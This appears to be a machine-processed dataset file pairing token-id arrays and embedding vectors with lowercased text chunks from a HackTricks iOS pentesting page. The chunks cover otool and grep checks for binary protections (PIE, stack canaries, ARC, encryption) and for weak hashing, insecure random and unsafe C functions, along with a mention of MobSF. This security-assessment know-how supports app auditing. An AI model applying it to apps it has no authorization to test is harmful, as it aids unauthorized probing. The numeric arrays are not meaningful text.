1041, 2290, 1024, 4601, 4601, 4601, 1029, 1029, 4601, 1028, 1000, 1006, 1011, 1011, 5164, 1007, 1006, 1011, 1011, 16396, 2015, 1011, 2069, 1007, 3638, 4339, 1000, 1026, 4769, 1028, 1000, 1000, 1026, 5418, 1041, 2290, 1024, 4601, 4601, 4601, 4601, 1028, 1000, 1006, 1011, 1011, 5164, 1007, 29296, 4221, 29337, 10250, 2015, 2064, 2224, 1996, 3094, 29296, 4221, 2000, 11835, 2007, 29296, 4221, 17881, 1012, 6164, 10288, 4183, 2860, 12707, 1045, 3335, 1999, 22224, 10760, 8103, 2075, 4725, 2823, 19119, 1996, 4646, 1006, 2023, 2003, 2036, 2138, 1997, 10424, 8524, 1007, 1012, 2017, 2064, 1005, 1056, 2224, 1996, 16021, 2696, 9623, 1997, 1996, 4280, 2000, 2655, 4972, 1997, 1996, 6013, 1012, 1998, 2017, 2064, 1005, 1056, 3443, 2047, 12107, 1997, 4280, 1998, 2224, 2068, 2000, 2655, 4972, 1012, 2045, 3475, 1005, 1056, 1037, 2460, 12690, 1006, 2066, 1996, 2028, 2005, 7020, 14277, 23111, 2378, 1007, 2000, 8103, 2035, 1996, 2691, 19888, 2080, 4725, 2108, 2109, 2011, 1996, 4646, 2000, 2156, 22330, 27921, 2098, 3793, 1010, 5810, 3793, 1010, 6309, 1010, 4921, 2015, 1998, 13792, 2109, 1012, 4236, 1011, 4236, 1011, 102 ]
hack_tricks
429.txt
2
[CLS] ios pentesting use trickest to easily build and automate workflows powered by the world's most advanced community tools. ios basicsios basicstesting environmentin this page you can find information about the ios simulator, emulators and jailbreaking : ios testing environmentinitial analysisbasic ios testing operationsduring the testing several operations are going to be suggested ( connect to the device, read / write / upload / download files, use some tools... ). therefore, if you don't know how to perform any of these actions please, start reading the page : ios basic testing operationsfor the following steps the app should be installed in the device and should have already obtained the ipa file of the application. read the basic ios testing operations page to learn how to do this. basic static analysisit's recommended to use the tool mobsf to perform an automatic static analysis to the ipa file. identification of protections are present in the binary : pie ( position independent executable ) : when enabled, the application loads into a random memory address every - time it launches, making it harder to predict its initial memory address. otool - hv < app - binary > | grep pie # it should include the pie flagstack canaries : to validate the integrity of the stack, a ‘ canary ’ value is placed on the stack before calling a function and is validated again once the function ends. otool - i - v < app - binary > | grep stack _ chk # it should include the symbols : stack _ chk _ guard and stack _ chk _ failarc ( automatic reference counting ) : to prevent common memory corruption flawsotool - i - v < app - binary > | grep objc _ release # it should include the _ objc _ release symbol encrypted binary : the binary should be encryptedotool - arch all - vl < app - binary > | grep - a5 lc _ encrypt # the cryptid should be 1identification of sensitive / insecure funcionsweak hashing algorithms # on the ios deviceotool - iv < app > | grep - w " _ cc _ md5 " otool - iv < app > | grep - w " _ cc _ sha1 " # on linuxgrep - ier " _ cc _ md5 " grep - ier " _ cc _ sha1 " insecure random functions #
[ 0.08166749775409698, -0.28007230162620544, -0.51984041929245, 0.6875022053718567, -0.09904670715332031, -0.621431827545166, 0.22587841749191284, 0.4448816478252411, 0.4472860097885132, 1.145603060722351, 0.03485528752207756, 0.3927554488182068, 0.3459640145301819, -0.5152884125709534, -0.5923227071762085, -0.38074439764022827, -0.36093437671661377, -0.25021952390670776, -0.288581907749176, -0.31442809104919434, 0.12204306572675705, -0.12466548383235931, -0.7460657358169556, -0.6448444128036499, -0.27305999398231506, 0.8522822260856628, 0.4456689953804016, -0.17049279808998108, 0.5774654746055603, 1.0129125118255615, -0.23022055625915527, 0.2643255591392517, -0.4336357116699219, -0.5828188061714172, 0.33902546763420105, -0.8678250312805176, 0.9227262139320374, -0.4388737976551056, 0.36726224422454834, -0.5645661354064941, 0.3584420680999756, -0.23518644273281097, 0.08812744170427322, -0.3389720618724823, -0.6065645217895508, -1.2597064971923828, -0.22701387107372284, -0.6090571284294128, 0.3145841956138611, -0.011065465398132801, 0.2233000546693802, 0.47155243158340454, -0.35957080125808716, 0.42686033248901367, 0.16580815613269806, 0.43321412801742554, 0.04276256263256073, 0.03945554420351982, -0.41807064414024353, 0.8450459837913513, 0.21514670550823212, 0.08251776546239853, 0.5475990772247314, -0.714219868183136, -0.10265912115573883, 0.44990697503089905, -0.3811698853969574, 0.04892846196889877, -0.6994529962539673, -0.5112457871437073, -0.6833400130271912, 0.6891872882843018, -0.3987531065940857, -0.8596181869506836, -0.6587205529212952, 0.05748541280627251, -0.3237674832344055, -0.7442985773086548, -0.20170263946056366, 1.1506396532058716, -0.039109233766794205, 0.49046066403388977, 0.25541049242019653, 0.12423481047153473, -0.006947328802198172, 0.040184278041124344, 0.38420382142066956, 0.33614134788513184, -0.4819311499595642, -0.254985511302948, 0.5446996688842773, 0.7008600831031799, -1.0332711935043335, -0.05843637138605118, 0.27070289850234985, 0.9998912215232849, -0.5274245142936707, 0.0034955458249896765, 0.12611129879951477, 0.16655974090099335, 0.9413676261901855, 0.4886097311973572, 0.25852447748184204, 0.6790146231651306, -0.6295672059059143, 0.3331507444381714, 0.2975044548511505, -0.577058732509613, -0.5489168167114258, -0.5953018069267273, 0.3255450129508972, -0.06047825887799263, 0.5815591812133789, -0.8268935084342957, -0.6000950932502747, 0.6764214634895325, 0.5573551654815674, -0.3870035409927368, -0.16480937600135803, 0.730853259563446, 0.1346805989742279, -0.07896611839532852, 0.5293092131614685, -0.2052583247423172, -0.02461927942931652, -0.08328314870595932, 0.5617679357528687, 0.32882073521614075, -0.39986279606819153, -0.4788607060909271, -0.06857287138700485, -0.3147580325603485, -0.1536368876695633, 0.7603527307510376, -0.6169793605804443, 0.3757924735546112, 0.3691577911376953, 0.31729358434677124, 0.6913626194000244, -0.6124632954597473, -0.07280413061380386, 0.20643706619739532, -0.057246338576078415, 1.3982045650482178, 0.7006266713142395, 0.21050584316253662, -0.19340042769908905, -0.5785366296768188, -0.39176321029663086, -0.43233636021614075, -0.5084856152534485, 0.12526145577430725, 0.495270311832428, -0.21980908513069153, -0.4763481914997101, 0.45990079641342163, -0.9772916436195374, 0.7404996156692505, -0.4714758098125458, -0.017831023782491684, 0.2642285227775574, 0.8381356596946716, -0.04384494945406914, 0.2809675335884094, -0.3933429718017578, -0.05461636558175087, -0.8076221942901611, -0.26219847798347473, 0.030224256217479706, 0.076004758477211, 0.3478044867515564, -0.0032798403408378363, -0.01147721242159605, 0.1195596307516098, 0.6200496554374695, 0.8999841809272766, 0.3812427222728729, 0.2364872246980667, 0.30850160121917725, 0.35919275879859924, -0.0537995919585228, 0.15854085981845856, 0.26033535599708557, 1.1951026916503906, -0.2956418991088867, 0.2411339282989502, -0.4189712703227997, -0.3526870906352997, 0.04751631245017052, -0.2716445028781891, -0.6267091035842896, 0.41169869899749756, -0.5808128714561462, 0.6102613806724548, 0.33042460680007935, 0.6216410994529724, -1.5237691402435303, 0.037800148129463196, -0.05149679630994797, -1.4184929132461548, -0.5682568550109863, 0.6078062653541565, -0.16641035676002502, 0.3617247939109802, -0.04343286156654358, -0.4059535264968872, 0.6027970910072327, 0.6835034489631653, -0.2884407639503479, 0.5117232203483582, 0.6495718359947205, -0.24211126565933228, -0.9504616260528564, 0.150934636592865, 0.388291597366333, 0.04211368411779404, -0.11972685903310776, 0.5431188941001892, 0.3792670965194702, -0.19424740970134735, -0.3343932330608368, 0.18821020424365997, 1.0074071884155273, 0.3384552001953125, 0.3163471519947052, -0.6502150893211365, 0.27783823013305664, 0.2065710872411728, -0.7301389575004578, 0.16938123106956482, -0.03070162795484066, 0.8214446306228638, 0.49305352568626404, 1.2098562717437744, 0.6693565845489502, -0.44189414381980896, -0.08503992855548859, 0.40383732318878174, 0.5128794312477112, 0.20991209149360657, 0.33400464057922363, 1.017091989517212, 0.44942617416381836, 0.7322989106178284, 0.7005480527877808, -0.1653682440519333, 0.043027520179748535, 0.19847750663757324, 0.6140469908714294, 0.08646391332149506, 0.12207500636577606, 0.8256014585494995, 0.4784184992313385, -0.11168434470891953, -0.5825374126434326, -0.497597873210907, 0.7765488028526306, 1.023526668548584, -0.6558638215065002, -0.9250258207321167, 0.18088774383068085, 0.1481824666261673, -0.10550873726606369, -0.28631332516670227, 0.1949416995048523, 0.5265042185783386, -0.7189282774925232, 0.1666073352098465, -0.4226730167865753, -0.6899312734603882, -0.6479055285453796, -0.13117444515228271, -1.0428773164749146, -0.15473368763923645, -1.0208691358566284, 0.12246332317590714, 0.4876684546470642, -0.8148241639137268, 0.31032800674438477, -0.5256208777427673, -0.42943161725997925, 0.06686636060476303, 0.2321702390909195, 0.8820945024490356, -0.24127858877182007, 0.014752410352230072, -1.1809377670288086, 0.17167147994041443, -0.5255205035209656, 0.6908006072044373, -0.3484059274196625, 0.022191381081938744, -0.5633012056350708, -0.20958282053470612, 0.055556993931531906, -0.25287503004074097, 0.2670510709285736, -0.054711662232875824, 0.0025108722038567066, -0.3481511175632477, 0.14813265204429626, -0.17743247747421265, 0.935986340045929, 0.1608264446258545, -0.10246646404266357, 0.8879290819168091, 0.43219780921936035, -0.36244887113571167, 0.0735819861292839, 0.6639185547828674, -0.741098940372467, 0.3327277898788452, -0.1911633163690567, 0.567874550819397, -0.5028491616249084, 0.4868827164173126, 0.6908376812934875, 0.3169800043106079, 0.5206981301307678, -0.1967288702726364, -0.06454642862081528, -0.8825444579124451, -0.1759118288755417, -0.11325516551733017, 0.22766971588134766, 0.04569781944155693, 0.06347117573022842, -0.9265254139900208, 0.02728232927620411, 0.0007459454936906695, -0.2880614697933197, -0.32506200671195984, -0.10406254976987839, 1.5573323965072632, 0.07241842895746231, -0.008180944249033928, 0.07829894125461578, -0.24138042330741882, 0.29407596588134766, 0.32897794246673584, 0.5022560358047485, -0.2936497628688812, 0.10770505666732788, -0.0761965960264206, -0.31510958075523376, 0.7198600172996521, 0.4424555003643036, -0.6366109848022461, -0.02251826412975788, -0.6148571372032166, -0.12203864008188248, -0.169025719165802, 0.04599820449948311, 0.4497198462486267, 0.1326293647289276, 0.5569384098052979, -0.7860382199287415, 0.3602968752384186, 0.1915203481912613, -0.07065870612859726, 0.26091569662094116, -0.386453777551651, 0.30835846066474915, 0.46880096197128296, -0.402208536863327, -0.42416897416114807, -0.1489834487438202, 0.46095678210258484, 0.1869649589061737, -0.27256476879119873, 0.7454870343208313, -0.157660111784935, 0.416169136762619, 0.5494781732559204, -0.4562411308288574, -0.5953941941261292, 1.1175841093063354, 0.08234655857086182, 0.9576879143714905, -0.35212442278862, 0.3726181387901306, -0.018719563260674477, 0.03129172697663307, 0.336741179227829, 0.4007854759693146, -0.5462802052497864, -0.9276865720748901, -0.17882587015628815, -0.4317612946033478, -0.4861010015010834, -0.019293619319796562, -0.13288773596286774, 0.32514235377311707, -0.38104838132858276, -1.05104398727417, -1.2084046602249146, 0.03077503852546215, 0.8048639893531799, 1.1131789684295654, 0.43220794200897217, 0.6890832185745239, 0.34154483675956726, -0.17957694828510284, 0.1317462921142578, -1.0255253314971924, 0.2679707705974579, 0.06289755553007126, 0.4602319002151489, -0.5563938021659851, -0.11042533814907074, -0.2706061899662018, 0.10861590504646301, -0.7416853904724121, -0.08471744507551193, -0.0725393071770668, -0.016136767342686653, -0.853888213634491, -0.17723874747753143, -0.5552905797958374, -0.36070162057876587, -0.7419131994247437, -0.3241211175918579, 0.13632316887378693, 0.4356098175048828, 1.0714311599731445, -0.8000158667564392, 0.15728910267353058, -0.5107591152191162, 0.10356941819190979, 0.22964824736118317, -0.04516981542110443, -0.578406810760498, -0.5741419792175293, -0.3254494071006775, -0.5473862290382385, 0.18831516802310944, 0.4871118664741516, 0.6360411643981934, 0.1499422937631607, -0.7866660356521606, -0.2427498698234558, 0.7763634324073792, -0.5258046984672546, -0.25939613580703735, -0.45187050104141235, -0.19145578145980835, 0.46295908093452454, 0.27189794182777405, -0.5088558197021484, -0.0676548108458519, 0.06864050030708313, -1.1763044595718384, 0.6242061257362366, -0.8159018158912659, 0.257390558719635, 0.07426724582910538, 0.18110410869121552, 0.1482163369655609, 0.32749810814857483, -0.3847861886024475, -0.207443505525589, -0.16432757675647736, 0.3643817901611328, -0.33538752794265747, -0.7194603681564331, 0.9186294078826904, -0.0028489427641034126, -0.36890581250190735, 0.48349982500076294, 0.14527975022792816, -0.7119417190551758, 0.27102896571159363, -0.4115052819252014, -0.6108542680740356, 0.5480610132217407, -0.782537579536438, 0.7209103107452393, -0.032154109328985214, 0.217244952917099, -0.4601121246814728, -0.22158057987689972, 0.6086392402648926, 0.16997013986110687, 0.43518757820129395, -1.435429334640503, -1.0900678634643555, 0.36212971806526184, 0.19899524748325348, 0.11291097104549408, 0.7774239778518677, 0.0933186486363411, -0.40041735768318176, -0.1224142462015152, 0.08663291484117508, -0.6927279233932495, -0.6733545660972595, -0.8686990141868591, -0.07052738964557648, 0.03218180686235428, -0.12833192944526672, 0.6384637355804443, 0.04206445440649986, -0.6409934163093567, 0.3493473529815674, -0.20791907608509064, 0.022771477699279785, -0.8027840852737427, 0.4026872217655182, -0.3974962532520294, 0.3858002722263336, -0.27108389139175415, 0.38990986347198486, 0.5145017504692078, -0.10460664331912994, 0.1852855235338211, 0.36124274134635925, -0.033293820917606354, -0.06243966892361641, -0.12190130352973938, 1.0871292352676392, 0.10182825475931168, 0.014818237163126469, -0.7566460967063904, 0.4262988865375519, 0.10243568569421768, 0.47855493426322937, -0.34874171018600464, -0.6399239897727966, -0.7306387424468994, -0.8814835548400879, 0.25449585914611816, -0.3062686026096344, 0.5439983010292053, -0.46999967098236084, -0.5506544709205627, 0.010573522187769413, 0.26514676213264465, 0.011383619159460068, -0.3457942008972168, 0.31013575196266174, 0.07655351608991623, 0.018016809597611427, -0.36435166001319885, -0.2115522027015686, -0.5648937225341797, -0.6611517071723938, -0.13540980219841003, 0.8431701064109802, -0.02274228259921074, -0.16348671913146973, 0.2075594961643219, -0.04822240024805069, 0.2682785391807556, -0.04526162147521973, -0.5538241267204285, -0.553987979888916, -0.3316006660461426, 0.17710916697978973, -0.1443527787923813, 0.5679852366447449, -0.6733015775680542, 0.36480382084846497, -0.3764602541923523, 0.16881994903087616, 0.025449033826589584, -0.600289523601532, -0.6279709339141846, 0.0017657004063948989, 1.459978699684143, -0.5407671332359314, 0.6968241930007935, 0.008026253432035446, 0.603460431098938, 0.49767589569091797, 0.18760283291339874, -1.6104133129119873, 0.15236061811447144, -0.5196776390075684, -1.0607609748840332, 0.6894654631614685, 0.218247190117836, -0.17733360826969147, -0.05527159571647644, -0.1132940798997879, 0.5732909440994263, -0.3839314579963684, 0.6850357055664062, 1.1196600198745728, -0.3209784924983978, 0.39684849977493286, -0.8581235408782959, 1.0545353889465332, 0.30557045340538025, 0.31757688522338867, 0.10331564396619797, -0.33509454131126404, 0.11874712258577347, -0.09322593361139297, -0.6712007522583008, -0.24277809262275696, -0.5796638131141663, -0.6022289991378784, 0.2536546587944031, 0.20635071396827698, 0.331940233707428, -0.2933943271636963, -0.7184180617332458, 0.1517830193042755, 0.39500048756599426, 0.3437715172767639, 0.26824337244033813, 0.7666404843330383, 0.3449687659740448, 0.22639046609401703, -0.15931454300880432, 0.011752424761652946, -0.17822594940662384, -0.1291002482175827, 0.6495932340621948, -0.0232054702937603, -1.0775800943374634, 0.6710638403892517, 0.3662208318710327, -1.1143425703048706, -0.34827813506126404, -0.07534194737672806, -0.11932782828807831, -0.0644235908985138, -0.22896304726600647, 0.08665947616100311, -0.1511886566877365, 0.346814900636673, 0.1847911775112152, 0.252058207988739, -0.3667321503162384, 0.24243906140327454, -0.6099712252616882, 0.36472856998443604, -0.022659296169877052, -0.2754739820957184, 0.5314844250679016, -0.9240552186965942, -0.8901688456535339, -1.2930777072906494, -0.07303400337696075, 0.33357879519462585, -0.06633803993463516, 0.9479854702949524, -0.10149212181568146, 0.6495941281318665, -0.029506715014576912, -0.05994022265076637, 0.3235715925693512, -0.09668995440006256, 0.172629714012146, 1.0711790323257446, -0.02301090396940708, -0.6413946747779846, -0.21145911514759064, 0.05062131956219673, 0.3115839660167694, 0.2844787538051605, -0.6901411414146423, -0.2443973571062088, 0.4812401831150055, 0.4325844943523407, -0.008604227565228939, -0.3728640079498291, -0.771782636642456, -0.8153375387191772, 0.30207133293151855, 0.2481720894575119, -0.5836337804794312, -0.17719434201717377, 0.3428013026714325, 0.4857099652290344, -0.001986975548788905, -0.11445526033639908, 0.18195566534996033, -0.5621305704116821, -0.3174639344215393, -0.7818278670310974, 0.6620058417320251, -0.5737985372543335, -0.32214388251304626, -0.5946946144104004, -0.6835064888000488, -0.8231810331344604, -0.7793326377868652, -0.7247455716133118, -0.033479973673820496, -0.6216150522232056, 0.39641615748405457, -0.4608432352542877, -0.04963621124625206, -0.1788245588541031, -0.4202080965042114, 0.45108965039253235, 0.6410935521125793, -0.3012748062610626, 0.7103046774864197, 0.09957806766033173, 0.6189311146736145, 0.6167859435081482, -0.2370186299085617, -0.011464960873126984, -0.26788151264190674, 0.276997834444046, 0.26047879457473755, -0.07456721365451813, -0.42201200127601624, 0.3970577120780945, -0.10801449418067932, -0.3650495707988739, 0.4783583879470825, -0.6783467531204224, -0.26311227679252625, -0.06045546755194664, -0.22103209793567657, -0.11136306822299957, 0.6260347366333008, 0.37425386905670166, 0.3696390390396118, -0.6429093480110168, 0.3080296218395233, 0.263431578874588, -0.23354417085647583, 0.12860117852687836, 0.4074782133102417, -0.026999525725841522, -0.20888091623783112, 0.21082180738449097, 0.21490389108657837, -0.44642916321754456, 0.3012632131576538, -0.5601460337638855, 0.0050020054914057255, -0.022422853857278824, -0.49506694078445435, 0.5022236108779907, 0.19882497191429138, 0.021322092041373253, -0.17922095954418182, 0.6972020268440247, 0.050053101032972336, -1.114194393157959, 0.24699996411800385, -0.986717700958252, -0.4815075099468231, 0.09118641167879105, -0.3903072476387024, -0.6159379482269287, -0.3142041862010956, 0.0903569906949997, 0.26923471689224243, -0.06146218627691269, 0.032981306314468384, -0.023114357143640518, -0.014125915244221687, 0.5382362604141235, 0.7901076078414917, -0.6293084025382996, -0.3782336115837097, -0.3302624821662903, 0.4792415201663971, -0.6943234801292419, -0.9044547080993652, 0.3330349028110504, 0.5224202871322632, -0.18205907940864563, -0.38656261563301086, -0.36578625440597534, -0.16963213682174683, 0.3315545916557312, -0.23216213285923004, 0.3046841025352478, 0.30753979086875916, -0.8408281803131104, 0.908778190612793, -0.5736829042434692, 0.42862606048583984, -0.09562930464744568, -0.035052668303251266, 0.12330041080713272, -0.5249448418617249, -0.8157690167427063, 0.5416623950004578, 0.075842946767807, -0.20891574025154114, 0.8555637001991272, 0.46343371272087097, 0.37131235003471375, 0.2093602567911148, -0.16877982020378113, -0.1375170648097992, 0.5104983448982239, 0.3383384048938751, 0.4941631257534027, -0.029294108971953392, 0.16010917723178864, 0.5764104723930359, -0.811618447303772, -0.14325344562530518, 0.7287954092025757, 0.14769698679447174, -0.5266902446746826, 0.5979511737823486, -0.6053540110588074, 0.06161394342780113, 0.38570350408554077, -0.3103480637073517, 0.2575398087501526, -0.2558135986328125, -0.02370048314332962, 0.31538596749305725, 0.2064472883939743, 0.8806079030036926, -0.4605545401573181, 0.243900328874588, 0.16408075392246246, -0.09352704882621765, 0.47919633984565735, -0.18077290058135986, -0.4518985450267792, 0.23707811534404755, 0.7040486335754395, 0.365264892578125, -0.045576419681310654, 0.5888206362724304, -0.07893753051757812, 0.1282164603471756, 0.25505268573760986, 0.13091294467449188, -0.7484949827194214, -0.25604119896888733, -0.00035119795938953757, -0.5397941470146179, -0.7847804427146912, 0.1445484757423401, 0.19891457259655, -0.8409599661827087, 0.4378964602947235, -0.12115766108036041, 0.23169825971126556, -0.7809664607048035, 0.5834155678749084, -0.2976174056529999, 0.3655710518360138, 0.393725723028183, -0.744603157043457, -0.38782796263694763, 0.9580205082893372, -0.22956959903240204, 0.30316460132598877, -0.32085180282592773, 0.7705628275871277, 0.48773232102394104, 0.4323030710220337, 0.3273542821407318, -0.2887274920940399, -0.12120059132575989, -0.06701959669589996, 0.10358750820159912, -0.5701394081115723, 0.02702776901423931, -0.7666604518890381, 0.5399646759033203, 0.20937488973140717, -0.9937925934791565, -0.38969483971595764, 0.08020739257335663, -0.509971022605896, -0.6893346309661865, 0.4807018041610718, -0.20783169567584991, -0.5080572366714478, 0.41961413621902466, -0.1440763622522354, 0.5620578527450562, 0.7082990407943726, -0.40987586975097656, -0.19818320870399475, -0.16755449771881104, -0.32605427503585815, -0.11423890292644501, 1.0214061737060547, -0.1637708693742752, -0.10727798938751221, 0.21854226291179657, -0.5947937965393066, -0.2526647448539734, 0.20397020876407623, -0.3786257207393646, -0.43668028712272644, 0.37288013100624084, 0.18174155056476593, 0.4565577208995819, 0.3672960698604584, -0.12020444124937057, -0.2962604761123657, -0.017502956092357635, 0.7660325765609741, -0.3102056384086609, 0.9582957625389099, 0.3772847354412079, -0.035087570548057556, 0.4730502963066101, 0.012047087773680687, 0.6512390971183777, -0.26606014370918274, -0.21502703428268433, -0.2983608543872833, -0.02366836555302143, -0.652841329574585, -0.5039393305778503, -0.018868587911128998, -0.1858176290988922, -0.39368388056755066, 0.4334105849266052, -1.2012337446212769, 0.3741055130958557, -0.7776170969009399, -0.4516778290271759, -0.23536206781864166, 0.3900929391384125, 0.27752578258514404, 0.1500033438205719, 0.9629368782043457, -1.0897477865219116, 4.333909511566162, 0.3304225206375122, -0.308472216129303, 0.5507654547691345, -0.2630656659603119, 0.30175310373306274, 1.1628152132034302, -0.8312925696372986, 0.1849544793367386, -0.46858200430870056, -0.24802866578102112, -0.0040659173391759396, 0.6059780716896057, -0.05535348132252693, 0.4599420130252838, 0.7413946986198425, -0.40229806303977966, 0.06532855331897736, 0.19528158009052277, -0.810357391834259, -1.0441056489944458, 0.46903082728385925, -0.5876572728157043, 0.4868610203266144, 0.4943429231643677, -0.14373968541622162, 0.6391420364379883, -0.6410387754440308, -0.3615676164627075, -0.049211639910936356, 0.3018121123313904, -0.43620726466178894, -0.18792280554771423, -0.44147583842277527, -0.4538433253765106, 0.5911465883255005, 0.1637854129076004, -0.4497101604938507, 0.12202092260122299, 0.3845421075820923, 0.059199776500463486, 0.10019569844007492, 0.6235508322715759, -0.0885864645242691, 0.00888042338192463, 0.7478356957435608, -0.24469996988773346, 0.2723000645637512, 0.5384178757667542, -0.6043112277984619, 0.7922098636627197, -0.16390520334243774, 0.3796479403972626, -0.44630488753318787, -0.73271244764328, -0.5461405515670776, -0.3427998125553131, -0.5872851610183716, -0.28565359115600586, -0.03774525225162506, 0.8950913548469543, -0.5931013226509094, 0.15247775614261627, -0.4255158603191376, -0.9214791655540466, 0.43170735239982605, -0.2035026252269745, 0.727323591709137, -0.0981132984161377, 0.15754273533821106, -0.6735321283340454, -0.02909853495657444, -0.8369541764259338, -0.1288980394601822, 1.0877447128295898, 0.04113689064979553, -0.10967472940683365, 0.5675714612007141, 0.5033231377601624, -1.0107871294021606, 0.17532113194465637, -0.18819552659988403, -0.7767207622528076, 0.39208105206489563, 1.449753761291504, 0.30712881684303284, 0.10597085952758789, -0.6477806568145752, -0.047023750841617584, 0.0103192999958992, 0.8143981695175171, -0.0004442785866558552, -0.40401896834373474, -0.413911372423172, 0.18581081926822662 ]
[ 101, 16380, 7279, 22199, 2075, 2224, 7577, 4355, 2000, 4089, 3857, 1998, 8285, 8585, 2147, 12314, 2015, 6113, 2011, 1996, 2088, 1005, 1055, 2087, 3935, 2451, 5906, 1012, 16380, 24078, 10735, 24078, 22199, 2075, 4044, 2378, 2023, 3931, 2017, 2064, 2424, 2592, 2055, 1996, 16380, 25837, 1010, 7861, 20350, 2015, 1998, 7173, 23890, 2075, 1024, 16380, 5604, 4044, 5498, 20925, 4106, 22083, 2594, 16380, 5604, 3136, 24979, 2075, 1996, 5604, 2195, 3136, 2024, 2183, 2000, 2022, 4081, 1006, 7532, 2000, 1996, 5080, 1010, 3191, 1013, 4339, 1013, 2039, 11066, 1013, 8816, 6764, 1010, 2224, 2070, 5906, 1012, 1012, 1012, 1007, 1012, 3568, 1010, 2065, 2017, 2123, 1005, 1056, 2113, 2129, 2000, 4685, 2151, 1997, 2122, 4506, 3531, 1010, 2707, 3752, 1996, 3931, 1024, 16380, 3937, 5604, 3136, 29278, 1996, 2206, 4084, 1996, 10439, 2323, 2022, 5361, 1999, 1996, 5080, 1998, 2323, 2031, 2525, 4663, 1996, 24531, 5371, 1997, 1996, 4646, 1012, 3191, 1996, 3937, 16380, 5604, 3136, 3931, 2000, 4553, 2129, 2000, 2079, 2023, 1012, 3937, 10763, 4106, 4183, 1005, 1055, 6749, 2000, 2224, 1996, 6994, 11240, 22747, 2000, 4685, 2019, 6882, 10763, 4106, 2000, 1996, 24531, 5371, 1012, 8720, 1997, 28548, 2024, 2556, 1999, 1996, 12441, 1024, 11345, 1006, 2597, 2981, 4654, 8586, 23056, 1007, 1024, 2043, 9124, 1010, 1996, 4646, 15665, 2046, 1037, 6721, 3638, 4769, 2296, 1011, 2051, 2009, 18989, 1010, 2437, 2009, 6211, 2000, 16014, 2049, 3988, 3638, 4769, 1012, 27178, 13669, 1011, 1044, 2615, 1026, 10439, 1011, 12441, 1028, 1064, 24665, 13699, 11345, 1001, 2009, 2323, 2421, 1996, 11345, 9245, 2696, 3600, 2064, 12086, 1024, 2000, 9398, 3686, 1996, 11109, 1997, 1996, 9991, 1010, 1037, 1520, 17154, 1521, 3643, 2003, 2872, 2006, 1996, 9991, 2077, 4214, 1037, 3853, 1998, 2003, 9398, 4383, 2153, 2320, 1996, 3853, 4515, 1012, 27178, 13669, 1011, 1045, 1011, 1058, 1026, 10439, 1011, 12441, 1028, 1064, 24665, 13699, 9991, 1035, 10381, 2243, 1001, 2009, 2323, 2421, 1996, 9255, 1024, 9991, 1035, 10381, 2243, 1035, 3457, 1998, 9991, 1035, 10381, 2243, 1035, 8246, 2906, 2278, 1006, 6882, 4431, 10320, 1007, 1024, 2000, 4652, 2691, 3638, 7897, 21407, 11439, 4747, 1011, 1045, 1011, 1058, 1026, 10439, 1011, 12441, 1028, 1064, 24665, 13699, 27885, 3501, 2278, 1035, 2713, 1001, 2009, 2323, 2421, 1996, 1035, 27885, 3501, 2278, 1035, 2713, 6454, 4372, 26775, 22571, 3064, 12441, 1024, 1996, 12441, 2323, 2022, 4372, 26775, 22571, 3064, 11439, 4747, 1011, 7905, 2035, 1011, 1058, 2140, 1026, 10439, 1011, 12441, 1028, 1064, 24665, 13699, 1011, 1037, 2629, 29215, 1035, 4372, 26775, 22571, 2102, 1001, 1996, 19888, 3593, 2323, 2022, 1015, 5178, 16778, 10803, 1997, 7591, 1013, 16021, 29150, 4569, 10446, 26760, 25508, 23325, 2075, 13792, 1001, 2006, 1996, 16380, 5080, 11439, 4747, 1011, 4921, 1026, 10439, 1028, 1064, 24665, 13699, 1011, 1059, 1000, 1035, 10507, 1035, 9108, 2629, 1000, 27178, 13669, 1011, 4921, 1026, 10439, 1028, 1064, 24665, 13699, 1011, 1059, 1000, 1035, 10507, 1035, 21146, 2487, 1000, 1001, 2006, 11603, 17603, 2361, 1011, 29464, 2099, 1000, 1035, 10507, 1035, 9108, 2629, 1000, 24665, 13699, 1011, 29464, 2099, 1000, 1035, 10507, 1035, 21146, 2487, 1000, 16021, 29150, 6721, 4972, 1001 ]
hack_tricks
43.txt
0
on the ios deviceotool - iv < app > | grep - w " _ random " otool - iv < app > | grep - w " _ srand " otool - iv < app > | grep - w " _ rand " # on linuxgrep - ier " _ random " grep - ier " _ srand " grep - ier " _ rand " insecure ‘ malloc ’ function # on the ios deviceotool - iv < app > | grep - w " _ malloc " # on linuxgrep - ier " _ malloc " insecure and vulnerable functions # on the ios deviceotool - iv < app > | grep - w " _ gets " otool - iv < app > | grep - w " _ memcpy " otool - iv < app > | grep - w " _ strncpy " otool - iv < app > | grep - w " _ strlen " otool - iv < app > | grep - w " _ vsnprintf " otool - iv < app > | grep - w " _ sscanf " otool - iv < app > | grep - w " _ strtok " otool - iv < app > | grep - w " _ alloca " otool - iv < app > | grep - w " _ sprintf " otool - iv < app > | grep - w " _ printf " otool - iv < app > | grep - w " _ vsprintf " # on linuxgrep - r " _ gets " grep - ier " _ memcpy " grep - ier " _ strncpy " grep - ier " _ strlen " grep - ier " _ vsnprintf " grep - ier " _ sscanf " grep - ier " _ strtok " grep - ier " _ alloca " grep - ier " _ sprintf " grep - ier " _ printf " grep - ier " _ vsprintf " basic dynamic analysischeck out the dynamic analysis that mobsf perform. you will need to navigate through the different views and interact with them but it will be hooking several classes on doing other things and will prepare a report once you are done. listing installed appswhen targeting apps that are installed on the
[ 0.7204270362854004, -0.41473254561424255, -0.25344982743263245, 0.5783972144126892, -0.23330870270729065, 0.04687490686774254, -0.02058390900492668, 0.5136001110076904, 0.19957813620567322, 0.5322521328926086, 0.2025861144065857, 0.10273387283086777, 0.4981847405433655, -0.025304537266492844, -0.4554815888404846, -0.33398333191871643, -0.2556474208831787, -0.23963624238967896, -0.42294976115226746, 0.24398936331272125, 0.062381669878959656, 0.7759501338005066, -0.8193883895874023, -0.9323121309280396, -0.1649872362613678, 0.4646880030632019, 1.005344033241272, 0.15163496136665344, 0.532716691493988, 0.4636586308479309, 0.27709537744522095, 0.052442461252212524, -0.7079025506973267, -0.4286709427833557, 0.29627424478530884, -0.2053297907114029, 1.0889452695846558, -0.6235438585281372, 0.30472052097320557, -0.8568105697631836, 0.03751721605658531, -0.15959516167640686, 0.06836551427841187, -0.6448053121566772, -0.17002540826797485, -0.4190555214881897, 0.15753819048404694, -0.26930665969848633, 0.581990122795105, -0.3444424271583557, 0.04731070622801781, 0.4110385775566101, -0.08263584971427917, 0.3200361728668213, 0.4269348382949829, -0.2368021458387375, -0.07771986722946167, 0.25786271691322327, -0.24822232127189636, 0.13745030760765076, -0.09162978082895279, 0.38774511218070984, 0.23464950919151306, -1.0489174127578735, -0.04665428027510643, 0.23079660534858704, 